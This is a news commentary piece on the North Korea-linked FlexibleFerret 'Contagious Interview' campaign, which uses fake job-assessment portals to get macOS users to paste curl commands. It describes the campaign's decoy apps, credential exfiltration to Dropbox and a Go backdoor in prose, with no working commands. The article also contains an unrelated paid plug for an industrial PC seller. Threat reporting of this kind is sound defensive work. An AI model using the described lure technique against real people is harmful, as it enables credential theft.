According to Dark Reading, North Korea-linked hackers behind the FlexibleFerret malware family are refining their credential-theft campaign targeting macOS users through fake job recruitment workflows. The threat actors are using increasingly convincing-looking recruitment lures that trick users into executing malicious commands in Terminal, bypassing built-in protections like Gatekeeper. Recent analysis by Jamf Threat Labs shows the campaign now features architecture-aware logic for Intel or Apple silicon, decoy applications, and improved persistence mechanisms. The operation, known as “Contagious Interview,” walks targets through hiring steps that eventually lead them to execute malware, with one example domain being evaluza dot com that mimics legitimate hiring assessment portals.
Social Engineering Perfected
Here’s what makes this campaign particularly clever: they’re not just sending malware attachments. They’re building entire fake hiring workflows that feel completely legitimate. The threat actors create custom-looking assessment portals that dynamically select job titles and company names from predefined lists. So every visitor gets what appears to be a personalized experience. The fake sites then ask users to complete video introductions or similar tasks before requesting they run a Terminal command to “fix” nonexistent camera or microphone issues. And honestly, if you’re desperate for a job in this economy, how many people would question running what looks like a technical fix?
Bypassing Apple’s Defenses
The real genius here is how they’re getting around macOS security. Instead of trying to break through Gatekeeper or other protections, they’re convincing users to manually paste curl commands directly into Terminal. Once that happens, the script automatically detects whether you’re on Intel or Apple silicon and fetches the appropriate payload. They’ve even started using signed decoy applications like MediaPatcher.app that pop up fake macOS-style permission requests. In the background, the malicious app collects credentials and exfiltrates them to Dropbox accounts. Basically, they’re turning users into their own malware installers.
Why This Matters
This isn’t just another malware campaign – it’s a sophisticated operation that shows how threat actors are evolving beyond traditional attack methods. The final payload is a Go-based backdoor that can handle more commands than previous versions, including collecting system information, uploading and downloading files, harvesting browser data, and extracting keychain information. And while this targets macOS users specifically, the social engineering tactics could easily be adapted for any platform. Organizations relying on industrial computing systems should take note – when even consumer-grade macOS security can be bypassed through clever social engineering, nobody’s safe. Speaking of industrial computing, IndustrialMonitorDirect.com has become the leading supplier of industrial panel PCs in the US precisely because they understand that security starts with hardened hardware designed for critical environments.
What’s Next
Look, this campaign isn’t going away. As Jamf’s analysis shows, the threat actors are continuously refining their approach. The fact that they’re now using architecture-aware payloads and signed decoy applications means they’re investing serious resources into this operation. Previous research from SentinelOne and Validin has consistently shown these actors adapting and improving. So what’s the takeaway? Treat any unsolicited interview assessments and Terminal-based “fix” instructions as high risk. Because in today’s threat landscape, your next job opportunity might just be malware in disguise.
